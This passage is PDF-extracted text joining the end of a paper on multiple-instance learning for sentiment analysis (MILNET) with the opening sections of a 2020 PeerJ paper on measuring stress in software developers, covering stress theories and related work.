as ed Extracted via HIERNETgt (0.13) [+0.26] The food was good+ (0.10) [+0.26] but nothing wowed me.+ (0.09) [+0.26] The restaurant itself is bright and clean+ (0.13) [+0.26] Both dishes were tasty+ (0.18) [+0.26] I will go back again+ Extracted via MILNETgt (0.16) [+0.12] The food was good+ (0.12) [+0.43] The restaurant itself is bright and clean+ (0.19) [+0.15] I will go back again+ (0.09) [–0.07] but nothing wowed me.− (0.10) [–0.10] the food was a a little cold (lukewarm)− S en t- ba se d (0.12) [+0.23] Both dishes were tasty, as were the sides+ (0.18) [+0.23] The food was good, but nothing wowed me+ (0.22) [+0.23] One thing that was disappointing was that the food was a a little cold (lukewarm)+ (0.13) [+0.26] Both dishes were tasty, as were the sides+ (0.20) [+0.59] I will go back again when I feel like eating outside the box+ (0.18) [–0.12] The food was good, but nothing wowed me− (number): attention weight [number]: non-gated polarity score text+: extracted positive opinion text−: extracted negative opinion Figure 8: Example EDU- and sentence-based opinion summaries produced by HIERNETgt and MILNETgt. ence for MILNET across criteria. The second block shows significant preference for MILNET against HIERNET on informativeness and polarity, whereas HIERNET was more often preferred in terms of coherence, although the difference is not statisti- cally significant. The third block compares sentence and EDU summaries produced by MILNET. EDU summaries were perceived as significantly better in terms of informativeness and polarity, but not co- herence. This is somewhat expected as EDUs tend to produce more terse and telegraphic text and may seem unnatural due to segmentation errors. In the fourth block we observe that participants find MIL- NET more informative and better at distilling polar- ity compared to the LEAD and RANDOM (EDUs) baselines. We should point out that the LEAD sys- tem is not a strawman; it has proved hard to out- perform by more sophisticated methods (Nenkova, 2005), particularly on the newswire domain. Example EDU- and sentence-based summaries produced by gated variants of HIERNET and MIL- NET are shown in Figure 8, with attention weights and polarity scores of the extracted segments shown in round and square brackets respectively. For both granularities, HIERNET’s positive document-level prediction results in a single polarity score assigned to every segment, and further adjusted using the cor- responding attention weights. The extracted seg- ments are informative, but fail to capture the neg- ative sentiment of some segments. In contrast, MIL- NET is able to detect positive and negative snippets via individual segment polarities. Here, EDU seg- mentation produced a more concise summary with a clearer grouping of positive and negative snippets. 7 Conclusions In this work, we presented a neural network model for fine-grained sentiment analysis within the frame- work of multiple instance learning. Our model can be trained on large scale sentiment classifica- tion datasets, without the need for segment-level labels. As a departure from the commonly used vector-based composition, our model first predicts sentiment at the sentence- or EDU-level and subse- quently combines predictions up the document hier- archy. An attention-weighted polarity scoring tech- nique provides a natural way to extract sentiment- heavy opinions. Experimental results demonstrate the superior performance of our model against more conventional neural architectures. Human evalua- tion studies also show that MILNET opinion extracts are preferred by participants and are effective at cap- turing informativeness and polarity, especially when using EDU segments. In the future, we would like to focus on multi-document, aspect-based extraction (Cao et al., 2017) and ways of improving the coher- ence of our summaries by taking into account more fine-grained discourse information (Daumé III and Marcu, 2002). 28 Acknowledgments The authors gratefully acknowledge the support of the European Research Council (award num- ber 681760). We thank TACL action editor Ani Nenkova and the anonymous reviewers whose feed- back helped improve the present paper, as well as Charles Sutton, Timothy Hospedales, and members of EdinburghNLP for helpful discussions and sug- gestions. References Stuart Andrews and Thomas Hofmann. 2004. Multiple instance learning via disjunctive programming boost- ing. In Advances in Neural Information Processing Systems 16, pages 65–72. Curran Associates, Inc. Stefano Baccianella, Andrea Esuli, and Fabrizio Sebas- tiani. 2010. SentiWordNet 3.0: An enhanced lexi- cal resource for sentiment analysis and opinion min- ing. In Proceedings of the 5th Conference on In- ternational Language Resources and Evaluation, vol- ume 10, pages 2200–2204, Valletta, Malta. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Ben- gio. 2015. Neural machine translation by jointly learning to align and translate. In Proceedings of the 3rd International Conference on Learning Represen- tations, San Diego, California, USA. Parminder Bhatia, Yangfeng Ji, and Jacob Eisenstein. 2015. Better document-level sentiment analysis from RST discourse parsing. In Proceedings of the 2015 Conference on Empirical Methods in Natural Lan- guage Processing, pages 2212–2218, Lisbon, Portu- gal. Ziqiang Cao, Wenjie Li, Sujian Li, and Furu Wei. 2017. Improving multi-document summarization via text classification. In Proceedings of the 31st AAAI Con- ference on Artificial Intelligence, pages 3053–3058, San Francisco, California, USA. Peter Carbonetto, Gyuri Dorkó, Cordelia Schmid, Hen- drik Kück, and Nando De Freitas. 2008. Learning to recognize objects with little supervision. International Journal of Computer Vision, 77(1):219–237. Giuseppe Carenini, Rymond Ng, and Adam Pauls. 2006. Multidocument summarization of evaluative text. In Proceedings of the 11th Conference of the European Chapter of the Association for Computational Linguis- tics, pages 305–312, Trento, Italy. Lynn Carlson, Daniel Marcu, and Mary Ellen Okurowski. 2003. Building a discourse-tagged corpus in the framework of rhetorical structure theory. In Current and New Directions in Discourse and Dialogue, pages 85–112. Springer. Jianpeng Cheng and Mirella Lapata. 2016. Neural sum- marization by extracting sentences and words. In Pro- ceedings of the 54th Annual Meeting of the Associa- tion for Computational Linguistics (Volume 1: Long Papers), pages 484–494, Berlin, Germany. Timothee Cour, Ben Sapp, and Ben Taskar. 2011. Learn- ing from partial labels. Journal of Machine Learning Research, 12(May):1501–1536. Hal Daumé III and Daniel Marcu. 2002. A noisy-channel model for document compression. In Proceedings of the 40th Annual Meeting of the Association for Com- putational Linguistics, pages 449–456, Philadelphia, Pennsylvania, USA. Misha Denil, Alban Demiraj, and Nando de Freitas. 2014. Extraction of salient sentences from labelled documents. Technical report, University of Oxford. Giuseppe Di Fabbrizio, Amanda Stent, and Robert Gaizauskas. 2014. A hybrid approach to multi- document summarization of opinions in reviews. In Proceedings of the 8th International Natural Lan- guage Generation Conference (INLG), pages 54–63, Philadelphia, Pennsylvania, USA. Qiming Diao, Minghui Qiu, Chao-Yuan Wu, Alexan- der J. Smola, Jing Jiang, and Chong Wang. 2014. Jointly modeling aspects, ratings and sentiments for movie recommendation (JMARS). In Proceedings of the 20th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pages 193– 202, New York, NY, USA. Thomas G. Dietterich, Richard H. Lathrop, and Toms Lozano-Prez. 1997. Solving the multiple instance problem with axis-parallel rectangles. Artificial Intel- ligence, 89(1):31 – 71. Wei Vanessa Feng and Graeme Hirst. 2012. Text-level discourse parsing with rich linguistic features. In Pro- ceedings of the 50th Annual Meeting of the Associa- tion for Computational Linguistics (Volume 1: Long Papers), pages 60–68, Jeju Island, Korea. Kavita Ganesan, ChengXiang Zhai, and Jiawei Han. 2010. Opinosis: A graph based approach to abstrac- tive summarization of highly redundant opinions. In Proceedings of the 23rd International Conference on Computational Linguistics, pages 340–348, Beijing, China. Shima Gerani, Yashar Mehdad, Giuseppe Carenini, Ray- mond T. Ng, and Bita Nejat. 2014. Abstractive sum- marization of product reviews using discourse struc- ture. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 1602–1613, Doha, Qatar. Raphael Hoffmann, Congle Zhang, Xiao Ling, Luke Zettlemoyer, and Daniel S Weld. 2011. Knowledge- based weak supervision for information extraction of 29 overlapping relations. In Proceedings of the 49th An- nual Meeting of the Association for Computational Linguistics: Human Language Technologies-Volume 1, pages 541–550, Portland, Oregon, USA. Minqing Hu and Bing Liu. 2004. Mining and summa- rizing customer reviews. In Proceedings of the 10th ACM SIGKDD International Conference on Knowl- edge Discovery and Data Mining, pages 168–177, Seattle, Washington, USA. Rie Johnson and Tong Zhang. 2015a. Effective use of word order for text categorization with convolu- tional neural networks. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 103–112, Denver, Col- orado, USA. Rie Johnson and Tong Zhang. 2015b. Semi-supervised convolutional neural networks for text categorization via region embedding. In Advances in Neural Infor- mation Processing Systems 28, pages 919–927. Curran Associates, Inc. Jim Keeler and David E. Rumelhart. 1992. A self-organizing integrated segmentation and recogni- tion neural net. In Advances in Neural Informa- tion Processing Systems 4, pages 496–503. Morgan- Kaufmann. Yoon Kim. 2014. Convolutional neural networks for sen- tence classification. In Proceedings of the 2014 Con- ference on Empirical Methods in Natural Language Processing, pages 1746–1751, Doha, Qatar. Dimitrios Kotzias, Misha Denil, Nando De Freitas, and Padhraic Smyth. 2015. From group to individual la- bels using deep features. In Proceedings of the 21th ACM SIGKDD International Conference on Knowl- edge Discovery and Data Mining, pages 597–606, Sydney, Australia. Quoc Le and Tomas Mikolov. 2014. Distributed repre- sentations of sentences and documents. In Proceed- ings of the 31st International Conference on Machine Learning, pages 1188–1196, Beijing, China. Kevin Lerman, Sasha Blair-Goldensohn, and Ryan Mc- Donald. 2009. Sentiment summarization: Evaluating and learning user preferences. In Proceedings of the 12th Conference of the European Chapter of the ACL, pages 514–522, Athens, Greece. Junyi Jessy Li, Kapil Thadani, and Amanda Stent. 2016. The role of discourse units in near-extractive summa- rization. In Proceedings of the SIGDIAL 2016 Con- ference, The 17th Annual Meeting of the Special Inter- est Group on Discourse and Dialogue, pages 137–147, Los Angeles, California, USA. William C. Mann and Sandra A. Thompson. 1988. Rhetorical structure theory: Toward a functional the- ory of text organization. Text-Interdisciplinary Jour- nal for the Study of Discourse, 8(3):243–281. Oded Maron and Aparna Lakshmi Ratan. 1998. Multiple-instance learning for natural scene classifica- tion. In Proceedings of the 15th International Con- ference on Machine Learning, volume 98, pages 341– 349, San Francisco, California, USA. Ramesh Nallapati, Feifei Zhai, and Bowen Zhou. 2017. SummaRuNNer: A recurrent neural network based se- quence model for extractive summarization of docu- ments. In Proceedings of the 31st AAAI Conference on Artificial Intelligence, pages 3075–3081, San Fran- cisco, California. Ani Nenkova. 2005. Automatic text summarization of newswire: Lessons learned from the document under- standing conference. In Proceedings of the 20th AAAI, pages 1436–1441, Pittsburgh, Pennsylvania, USA. Eric Noreen. 1989. Computer-intensive Methods for Testing Hypotheses: An Introduction. Wiley. Bo Pang and Lillian Lee. 2005. Seeing stars: Ex- ploiting class relationships for sentiment categoriza- tion with respect to rating scales. In Proceedings of the 43rd Annual Meeting on Association for Compu- tational Linguistics, pages 115–124. Association for Computational Linguistics. Bo Pang, Lillian Lee, and Shivakumar Vaithyanathan. 2002. Thumbs up? sentiment classification using ma- chine learning techniques. In Proceedings of the 2002 Conference on Empirical Methods in Natural Lan- guage Processing, pages 79–86, Pittsburgh, Pennsyl- vania, USA. Nikolaos Pappas and Andrei Popescu-Belis. 2014. Ex- plaining the stars: Weighted multiple-instance learn- ing for aspect-based sentiment analysis. In Proceed- ings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 455–466, Doha, Qatar, October. Nikolaos Pappas and Andrei Popescu-Belis. 2017. Ex- plicit document modeling through weighted multiple- instance learning. Journal of Artificial Intelligence Re- search, 58:591–626. Lizhen Qu, Georgiana Ifrim, and Gerhard Weikum. 2010. The bag-of-opinions method for review rating prediction from sparse text patterns. In Proceedings of the 23rd International Conference on Computational Linguistics, pages 913–921, Beijing, China. Richard Socher, Jeffrey Pennington, Eric H. Huang, An- drew Y. Ng, and Christopher D. Manning. 2011. Semi-supervised recursive autoencoders for predicting sentiment distributions. In Proceedings of the 2011 Conference on Empirical Methods in Natural Lan- guage Processing, pages 151–161, Edinburgh, Scot- land, UK. 30 Richard Socher, Alex Perelygin, Jean Wu, Jason Chuang, Christopher D. Manning, Andrew Y. Ng, and Christo- pher Potts. 2013. Recursive deep models for semantic compositionality over a sentiment treebank. In Pro- ceedings of the 2013 Conference on Empirical Meth- ods in Natural Language Processing, pages 1631– 1642, Seattle, Washington, USA. Maite Taboada, Julian Brooke, Milan Tofiloski, Kimberly Voll, and Manfred Stede. 2011. Lexicon-based meth- ods for sentiment analysis. Computational Linguis- tics, 37(2):267–307. Oscar Täckström and Ryan McDonald. 2011. Discov- ering fine-grained sentiment with latent variable struc- tured prediction models. In Proceedings of the 39th European Conference on Information Retrieval, pages 368–374, Aberdeen, Scotland, UK. Duyu Tang, Bing Qin, and Ting Liu. 2015. Document modeling with gated recurrent neural network for sen- timent classification. In Proceedings of the 2015 Con- ference on Empirical Methods in Natural Language Processing, pages 1422–1432, Lisbon, Portugal. Peter D Turney. 2002. Thumbs up or thumbs down?: Semantic orientation applied to unsupervised classifi- cation of reviews. In Proceedings of the 40th annual meeting on association for computational linguistics, pages 417–424, Pittsburgh, Pennsylvania, USA. Sida Wang and Christopher D. Manning. 2012. Base- lines and bigrams: Simple, good sentiment and topic classification. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguis- tics: Short Papers-Volume 2, pages 90–94, Jeju Island, Korea. Xiu-Shen Wei, Jianxin Wu, and Zhi-Hua Zhou. 2014. Scalable multi-instance learning. In Proceedings of the IEEE International Conference on Data Mining, pages 1037–1042, Shenzhen, China. Nils Weidmann, Eibe Frank, and Bernhard Pfahringer. 2003. A two-level learning method for generalized multi-instance problems. In Proceedings of the 14th European Conference on Machine Learning, pages 468–479, Dubrovnik, Croatia. Janyce Wiebe, Theresa Wilson, and Claire Cardie. 2005. Annotating expressions of opinions and emotions in language. Language resources and evaluation, 39(2):165–210. Jiajun Wu, Yinan Yu, Chang Huang, and Kai Yu. 2015. Deep multiple instance learning for image classifica- tion and auto-annotation. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recogni- tion, pages 3460–3469, Boston, Massachusetts, USA. Rui Xia and Chengqing Zong. 2010. Exploring the use of word relation features for sentiment classification. In Proceedings of the 23rd International Conference on Computational Linguistics: Posters, pages 1336– 1344, Beijing, China. Xin Xu and Eibe Frank. 2004. Logistic regression and boosting for labeled bags of instances. In Proceed- ings of the Pacific-Asia Conference on Knowledge Dis- covery and Data Mining, pages 272–281. Springer- Verlag. Wei Xu, Alan Ritter, Chris Callison-Burch, William B. Dolan, and Yangfeng Ji. 2014. Extracting lexically divergent paraphrases from Twitter. Transactions of the Association for Computational Linguistics, 2:435– 448. Zichao Yang, Diyi Yang, Chris Dyer, Xiaodong He, Alex Smola, and Eduard Hovy. 2016. Hierarchical atten- tion networks for document classification. In Pro- ceedings of the 2016 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 1480– 1489, San Diego, California, USA. Matthew D. Zeiler. 2012. ADADELTA: an adaptive learning rate method. CoRR, abs/1212.5701. Qi Zhang, Sally A. Goldman, Wei Yu, and Jason E. Fritts. 2002. Content-based image retrieval using multiple- instance learning. In Proceedings of the 19th Inter- national Conference on Machine Learning, volume 2, pages 682–689, Sydney, Australia. Cha Zhang, John C. Platt, and Paul A. Viola. 2006. Mul- tiple instance boosting for object detection. In Ad- vances in Neural Information Processing Systems 18, pages 1417–1424. MIT Press. Zhi-Hua Zhou, Yu-Yin Sun, and Yu-Feng Li. 2009. Multi-instance learning by treating instances as non- iid samples. In Proceedings of the 26th Annual In- ternational Conference on Machine Learning, pages 1249–1256, Montréal, Quebec. 31 32 work_nfb3nb2bjzgehk6wxpj525oqka ---- A methodology for psycho-biological assessment of stress in software engineering A methodology for psycho-biological assessment of stress in software engineering Jan-Peter Ostberg1, Daniel Graziotin1, Stefan Wagner1 and Birgit Derntl2 1 Institute of Software Engineering, University of Stuttgart, Stuttgart, Germany 2 Department of Psychiatry and Psychotherapy, University of Tübingen, Tübingen, Germany ABSTRACT Stress pervades our everyday life to the point of being considered the scourge of the modern industrial world. The effects of stress on knowledge workers causes, in short term, performance fluctuations, decline of concentration, bad sensorimotor coordination, and an increased error rate, while long term exposure to stress leads to issues such as dissatisfaction, resignation, depression and general psychosomatic ailment and disease. Software developers are known to be stressed workers. Stress has been suggested to have detrimental effects on team morale and motivation, communication and cooperation-dependent work, software quality, maintainability, and requirements management. There is a need to effectively assess, monitor, and reduce stress for software developers. While there is substantial psycho-social and medical research on stress and its measurement, we notice that the transfer of these methods and practices to software engineering has not been fully made. For this reason, we engage in an interdisciplinary endeavor between researchers in software engineering and medical and social sciences towards a better understanding of stress effects while developing software. This article offers two main contributions. First, we provide an overview of supported theories of stress and the many ways to assess stress in individuals. Second, we propose a robust methodology to detect and measure stress in controlled experiments that is tailored to software engineering research. We also evaluate the methodology by implementing it on an experiment, which we first pilot and then replicate in its enhanced form, and report on the results with lessons learned. With this work, we hope to stimulate research on stress in software engineering and inspire future research that is backed up by supported theories and employs psychometrically validated measures. Subjects Bioinformatics, Human-Computer Interaction, Software Engineering Keywords Stress, Software development, Biological markers, Methodology, Psychological assessment, Effects of stress INTRODUCTION Our modern industrialized world is moving fast and demands a lot from the workers within its system, which leaves them stressed out. Some consider stress the scourge of the modern industrial world (De Jonge et al., 1998). Stress is a response to exceeding demands placed upon the body or mind (Selye, 1976). It is well known that stress is highly related to the deterioration of physical and mental health (Sonnentag et al., 1994; How to cite this article Ostberg J-P, Graziotin D, Wagner S, Derntl B. 2020. A methodology for psycho-biological assessment of stress in software engineering. PeerJ Comput. Sci. 6:e286 DOI 10.7717/peerj-cs.286 Submitted 12 December 2019 Accepted 6 July 2020 Published 10 August 2020 Corresponding author Jan-Peter Ostberg, jan-peter.ostberg@informatik. uni-stuttgart.de Academic editor Arie van Deursen Additional Information and Declarations can be found on page 33 DOI 10.7717/peerj-cs.286 Copyright 2020 Ostberg et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.286 mailto:jan-peter.�ostberg@�informatik.�uni-stuttgart.�de mailto:jan-peter.�ostberg@�informatik.�uni-stuttgart.�de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.286 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Kaufmann, Pornschlegel & Udris, 1982). Individuals who perceive a large amount of stress have an increased risk of premature death, coronary heart disease, and mental disorders such as depression or burn-out, as the World Health Organization realized as early as World Health Organization and Others (1969) and continued to investigate the problem (World Health Organization, 2005). Stress as well as the mere anticipation of stress (Hyun, Sliwinski & Smyth, 2018) also has a negative impact on the quality of products, as it increases workers error rates (Akula & Cusick, 2008). Workplace environments that are characterized by physical work have been improved over time by research on ergonomic tools as well as their placement to lessen physical strain, and alternation of tasks and restructuring of processes to counter dulling repetitive work. The aim is the replenishment of physical and cognitive resources which were consumed by the stressful tasks. Still, the stress experienced by knowledge workers, like software developers, has a wide range of research opportunities in terms of understanding and preventing generation of (chronic) stress and its effects (Meier et al., 2018; Ostberg et al., 2017). Software developers are stressed workers. Short time to market, requirements originating from legislators leading to high penalty payments, fast-changing technological environments (Chilton, Hardgrave & Armstrong, 2010), the need to plan for software legacy and obsolescence and interaction with customers (Rajeswari & Anantharaman, 2003), as well as possible time zone, linguistic, and cultural differences (Amin et al., 2011) are just the tip of the iceberg for potential long-term stressors in software development. Day to day stressors such as cryptic error messages, unintuitive integrated development environments (IDEs), changing requirements which cause high cognitive stain, should be kept as low as possible to avoid an additional burden to body and mind (Graziotin et al., 2017). Stress has been suggested to have detrimental effects on defect rates, team morale as well as motivation, software quality, maintainability, and requirements management (Meier et al., 2018). While short-term stress can be pushing and beneficial to software engineers, preliminary research suggests that we should find ways to reduce stress and develop tools for software development that help to reduce stress or at least are no sources of stress (Brown et al., 2018). We discussed ways to reduce stress of developers elsewhere (Ostberg et al., 2017), but without strong and validated, yet easy to adopt methodologies to detect, assess, and understand stress responses of individuals and groups of developers, it is hard to produce sound statements on the efficiency of any stress reduction approach. For detecting stress, research in software engineering has focused on machine learning and data mining approaches, wearable technologies (Suni Lopez, Condori-Fernández & Catala Bolos, 2018), and ad-hoc questionnaires (Meier et al., 2018) so far Brown et al. (2018) have offered a review of the few scattered studies—but we still see some research gaps, which we highlight in the next section, in terms of discovered knowledge as well as the way we borrow from established research from other disciplines. Hence, we are motivated to engage in an interdisciplinary endeavor between researchers in software engineering as well as medical and social science fields towards a better understanding of stress while developing software. Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 2/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ This article offers two main contributions. First, we provide an overview of supported theories of stress and the many ways to assess stress in individuals. Second, we propose a robust methodology to detect and measure stress in controlled experiments that is tailored to software engineering research. The methodology has been supported by two controlled experiments which we report on together with lessons learned. With this work, we hope to stimulate research on stress in software engineering and inspire future research that is backed up by supported theories and employs psychometrically validated measurement instruments. RELATED WORK There is substantial psycho-social and medical research on stress and its measurement (Brown et al., 2018) but the transfer to software engineering has yet to be made. This is also due to the many medical, psychological, and biological ways to measure stress and on how to report the results (Noack et al., 2019) creating the need for interdisciplinary work which increases the complexity of research projects. Furthermore, we believe that solid theoretical and methodological foundations should be a first step towards a better understanding of stress reactions of developers, as it should be with any psychological construct. Software engineering research, regretfully, is a long way from adopting rigorous and validated research artifacts. Feldt et al. (2008) argued in favor of systematic studies of human aspects of software engineering, more specifically to adopt measurement instruments that come from psychology. Seven years after the statement by Feldt et al. (2008) and Graziotin, Wang & Abrahamsson (2015a) explained that research on the emotional responses of software developers has been threatened by a lack of understanding the underlying constructs, in particular to exchange affect-related psychological constructs such as emotions and moods with motivation, commitment and well-being. The article offers a clarification of these constructs and presents validated measures. Meanwhile, Lenberg, Feldt & Wallgren (2015) had published a systematic literature review of studies of human aspects that made use of behavioral science. They called the field behavioral software engineering and found when conducting this kind of research that there are still several knowledge gaps and that there have been very few collaborations between software engineering and social science researchers. Graziotin, Wang & Abrahamsson (2015b) have also extended their prior observations to a broader view of software engineering research. Given, that much research in the field has misinterpreted, if not ignored, validated methodology and measurement instruments coming from psychology, the work offered brief guidelines to select a theoretical framework and validated measurement instruments from psychology. This includes a thorough evaluation of the psychometric properties of candidate instruments, which was later echoed in guidelines by Gren (2018) and Wagner et al. (2020). Wagner et al. (2020) have highlighted a major case of such misconduct, which is evident from the systematic literature review of personality research in software engineering by Cruz, Da Silva & Capretz (2015). The study review found that 48% of personality studies in software engineering use the Myers-Brigg Type Indicator (MBTI), which was known more than 20 years earlier to provide close to no validity and Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 3/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ reliability properties (Pittenger, 1993), meaning that the results of about half studies of personality in software engineering research are unlikely reflecting on personality in their conclusions. The software engineering body of knowledge on stress is quite small and also lacking much understanding of the phenomenon (Amin et al., 2011; Brown et al., 2018), even though there are few scattered studies that we can review. Prolonged exposure to stressful working conditions can lead to burnout as reported by Sonnentag et al. (1994). In their sample of 180 software professionals from 29 companies they found factors (e.g., lack of influence, lack of career prospects or stressors resulting from organizational policy) which can increase the risk of burnout but also approaches (e.g., improvement of team communication, challenging, interesting tasks or better career opportunities) for potential stress reduction. They measured the burnout potential with a combination of three hour long structured interviews and questionnaires. Fujigaki, Asakura & Haratani (1994) looked at the stress levels of Japanese information system managers in software development. They reported 33 stressors originating from the manager role as well as from the developer role. Again, authors relied on questionnaire data (background data, work-stressor items, questions on software project management details, and measurement of stress response) to reveal those stressors (e.g., job overload, technical difficulties or work environment). Using questionnaires, Hyman et al. (2003) examined the work-life balance situation of call-centre employes and software developers in the UK. Their results show that unpaid overtime is on the rise due to staff shortage or personal commitment to finish the task at hand by the end of the day. In their in-depth analysis of post-war British industry they find that, as most employes do not draw their Happiness from work, the work-life balance becomes more and more important, but harder to achieve, prompting additional stress in the lives of information and knowledge workers. A similar approach was adopted by Rajeswari & Anantharaman (2003). They again used a questionnaire with questions compiled of renowned papers from the field of research to survey Indian software professionals to identify potential stress factors. The 10 factors (fear of obsolescence, individual team interactions, client interactions, work-family interference, role overload, work culture, technical constraints, family support towards career, workload, technical risk propensity) they present in their work cover all aspects from social problems to skill related problems. This shows that these none- development related stressors will come on top of the development related problems we have identified in the introduction. Amin et al. (2011) published a brief literature review of stress and what its role might be in the context of global software development. The authors talk about the importance of studying occupational stress among software engineers given their nature as intellectual workers, in particular on their activities of knowledge sharing, which they found to be most likely to be obstructed by stress-related effects. The authors conclude their review with a proposition to be further expanded by future work, that is, “In a (global software development) environment, with time zone differences, linguistic differences, Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 4/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ technological issues, cultural issues and lack of trust, SE occupational stress will be higher and will impede knowledge sharing.” (p. 3). To our knowledge, no follow-up study exists. Müller & Fritz (2016) used bio-markers to determine the difficulty of understanding a piece of code and, based on that, predict the consequences for the quality of the code. They utilized the stress indicator of heart rate changes to assess the difficulty to understand the currently examined code by a participant. They observed a statistically significant connection between bio markers of stress and the resulting code quality. In a previous study Fritz et al. (2014) were monitoring the brain waves of the participants. The results show that it is possible to predict the perceived difficulty of a task based on psycho- physiological markers. As the difficulty of a task can be a stressor, brain waves are an interesting indicator to measure. However, this kind of study needs specialized equipment, making it hard to be used on groups and the analysis of the results is very complex. The influence of stress on the ability to think, memorize and concentrate has been examined by Behroozi et al. (2018) as stressing event. Behroozi et al. (2018) used technical interviews, using a whiteboard as a tool to communicate complex ideas. They used eye tracking to measure the fixations on areas of the whiteboard. The number of fixations on different areas increased under pressure indicating a lowered ability to concentrate, as the participants had to go back to previous sections more often. Suni Lopez, Condori-Fernández & Catala Bolos (2018) conducted a study towards the implementation of a real-time stress-detector system based on wearable devices but following an arousal-based statistical approach as opposed to previous studies, applying machine learning for understanding emotional states and stress. The validation study adopted an ad-hoc 7-point ordinal scale for stress detection (from “not stressed” to “extremely (stressed)”) and could obtain an accuracy of 80% using the arousal-based model. They found that the collaborative practices in agile might be a great source of stress. Therefore, they conducted a nationwide Swiss questionnaire on agile adoption in IT, where they asked (among other things) how agile software development influenced participants’ stress at work. Stress was assessed using an ad-hoc single item, ranging from 1 (significantly less stressed) to 5 (significantly more stressed). The research analyzes correlations between the stress item and agile practices, finding that, for example, high stress levels have a negative effect on team moral. From our examples of related work and the growing rate at which stress research in this area is conducted, we conclude that stress is a topic of interest in the computer science community. While all previous studies contributed to our understanding, there are indications that software engineering has been avoiding using robust and validated methodology for stress detection and psychological issues in general, thus threatening the validity and reliability of studies (Graziotin, Wang & Abrahamsson, 2015b). Most of these studies use non-standard, ad-hoc, and non psychometrically validated questionnaires to assess the stress reaction, either by self-report or a number of questions aimed to derive the personal stress level. The use of such calls for a rather large group of participants to increase the probability to be able to report significant results. Also, the analysis of the questionnaires Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 5/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ leaves space for interpretation as they tend to differ from study to study and thus make it difficult to compare different studies by different researchers. With our article and the following proposed method,we aim to critically extend the comparability of study results and hopefully overcome some of the previous limitations. BACKGROUND In the following, we will provide a definition of stress and different ways to measure it. We think it is important to have this background knowledge prior to designing sound studies. Also, the information provided can help researchers who are not trained in medicine and psychology to better understand their stress target in the design phase to assess if our proposed method is adequate for their topic of research. Definition of stress Stress has been viewed from medical, psychological and organizational angles resulting in many definitions. The most general definition of stress is the general adaptation syndrome (GAS) defined by Selye (1946). The GAS definition can fit every scenario from personal short-time stress event to global long-term scenarios, and it was based on a formulation by Weinert (2004) with an organizational and workforce psychology view. In the following we focus more closely to Weinert’s explanation of GAS, as it does not dive as deep as Selye into medical details and, hence, is easier to understand for an audience without medical background. Stress is “… an adaptive reaction to exceeding mental or physical demands of the surroundings. Adaptive, because the resilience towards those demands is individually different.” (Weinert, 2004). Weinert (2004) derives that definition from these factors of stress: 1. Stress needs a physical or psychosocial trigger event. 2. Individuals react differently to that trigger event. 3. Constraints and demands are linked to the build-up of stress. Constraints and demands are, for example, deadlines or quality requirements connected to the trigger. However, this does not mean that every event that fits the above definition necessarily affects a person. In this context, commonly mentioned conditions for people to be affected by stress are (Weinert, 2004): � The outcome or consequences of the trigger event must not be known beforehand. If the result of the stressful event is perceived as “unchangeable” it will generate no or much less stress compared to the same event with an uncertain outcome. � The outcome or consequences of the stressor have to have an influence, either good or bad. This becomes most obvious in high-stake scenarios, for example at war, were for example, Erwin Rommel said: “Don’t fight a battle if you don’t gain anything by winning.” (Rommel & Pimlott, 2014). Ostberg et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.286 6/38 http://dx.doi.org/10.7717/peerj-cs.286 https://peerj.com/computer-science/ For better understanding, let us make an example related to software development: A software product is due to be released to an important customer. The future of the company depends on this commercial operation because funds are running out. It is not known yet whether or not the customer will buy the product in the current state. The trigger event in our example is the prompt release of the product (deadline). The consequences of the stressor are not known, as it is not clear if the product will be sold, at what price and if this sale will keep the company financially afloat. The outcome is important to the developer because his/her job might depend on it. Each person in the company might experience a different level of stress connected to this scenario based, for example, on their individual judgement of the ease of finding a new job if the project is not successful and the company goes bankrupt. If a person has already taken mental dismissal and is sure to find a new job or already has a new job he/she might not experience any stress at all. The GAS can be used to model every stress interaction in general. As in the example above, it can be used to view the impact of stress (the critical release of the software product) on the company as a whole. A more narrow focus is the theory of Lazarus (1966) which refines the idea of Selye. By narrowing the reaction to a stressor to the cognitive processes active when dealing with stress (transactional or cognitive stress theory), this model is closer to the situation of knowledge workers such as software developers than the generalized model of Selye. In the transactional model, if a situation is assessed to be a strain, the situation can be considered as already harming, potentially harming (threatening) or as a risky, but worthwhile, challenge. The assessment and the progress of the situation based on the personal resources and the possible solutions for coping with the stressor can change over time. Based on these possibilities an actual reaction is provoked. This reaction to the stressor is, in the best case, a direct action to solve the stressful situation (fight) or, in less favorable constellations, evasion (flight) of the situation or other coping strategies (e.g., trivialization). This cycle of assessment based on the changing surroundings and continuous evaluation of coping strategies will be repeated until an appropriate coping strategy is found, which ends the stressing encounter. If no fitting coping strategy can be found, the person is either blocked by the continuing search cycle or through the application of unfitting solutions, with a high usage of resources, the problem is gradually eroded until it can be completely overcome. Let us again imagine a software engineering example for this stress model: A new member of a development team has been assigned to the first task in the project. It is a non-trivial part of the system to be implemented and it is the developer’s chance to prove his/her worth to the team. After the situation was found to be stressful, a second assessment of the problem reveals that the new member feels a lack of skills needed to finish the given task properly Ostberg et al. (2020), PeerJ Comput. Sci., DOI 